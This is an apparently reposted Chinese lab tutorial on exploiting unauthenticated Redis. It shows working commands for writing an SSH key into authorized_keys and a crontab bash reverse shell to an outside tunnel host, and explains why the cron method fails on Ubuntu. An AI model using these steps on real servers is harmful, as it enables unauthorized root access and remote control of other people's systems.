首页 / REDIS / redis未授权复现(二)
redis未授权复现(二)
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了redis未授权复现(二),小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含2399字,纯文字阅读大概需要4分钟。
内容图文
靶机vps:ubantu
靶机ip:50.7.61.25
安装一个redis
wget http://download.redis.io/releases/redis-2.8.12.tar.gz
tar -xzf redis-2.8.12.tar.gz
cd redis-2.8.12
make
cd src
./redis-cli -h
出现帮助菜单即安装成功
apt-get update
apt-get install redis-server
redis-server --port 8080
在靶机的8080端口启动redis
攻击机kali
如果kali没安装redis的话,参照上文安装即可
尝试连接靶机redis
./redis-cli -h 50.7.61.25 -p 8080
执行info命令有回显说明存在漏洞
利用方式
- ssh免密钥登录
- crontab反弹shell
- 对redis数据库写马拿shell
- 利用现有exp
(1)ssh免密钥登录
原理就是在数据库中插入一条数据,将本机的公钥作为value,key值随意,然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys,把缓冲的数据保存在文件里,这样就可以再服务器端的/root/.ssh下生一个授权的key。
首先在自己的电脑上生成key,我这里是空key
ssh-keygen -t rsa
cd /root/.ssh/
将公钥导入key.txt文件(前后用\n换行,避免和Redis里其他缓存数据混合),再把key.txt文件内容写入目标主机的缓冲里:
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt
cd /root/桌面/redis-2.8.12/src
cat /root/.ssh/key.txt | ./redis-cli -h 50.7.61.25 -p 8080 -x set xxx
连接靶机的Redis
./redis-cli -h 50.7.*.* -p 8080
设置redis的备份路径为/root/.ssh和保存文件名authorized_keys
config set dir /root/.ssh
config set dbfilename authorized_keys
save
ssh连接靶机
ssh 50.7.61.25
(2)crontab反弹shell
kali使用nc监听一个端口
然后kali连接靶机redis
./redis-cli -h 50.7.61.25 -p 8080
注:默认端口6379,这里我在靶机启动redis时是在8080端口启动的
设置备份路径与保存文件名(这里是centos的cron目录,ubantu看下文)
config set dir /var/spool/cron
config set dbfilename root
设置crontab任务
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/server.natappfree.cc/34409 0>&1\n\n"
save
我这里的ip用natapp做了个内网穿透,直接将shell弹到我的win10真实机上
在win10真实机上监听端口
1分钟后直接失败
看了https://xz.aliyun.com/t/5665#toc-8后
发现错误在于我的vps是ubantu系统
因为默认redis写文件后是644的权限,但ubuntu要求执行定时任务文件/var/spool/cron/crontabs/权限必须是600也就是-rw-------才会执行,否则会报错(root) INSECURE MODE (mode 0600 expected),而Centos的定时任务文件/var/spool/cron/权限644也能执行
参考
https://blog.csdn.net/guxiaoguo/article/details/78913245
https://blog.csdn.net/Jiajiajiang_/article/details/81368212
https://blog.csdn.net/qq_40989258/article/details/103278810?utm_medium=distribute.pc_relevant.none-task-blog-baidujs_baidulandingword-0&spm=1001.2101.3001.4242
https://xz.aliyun.com/t/5665#toc-8
内容总结
以上是互联网集市为您收集整理的redis未授权复现(二)全部内容,希望文章能够帮你解决redis未授权复现(二)所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。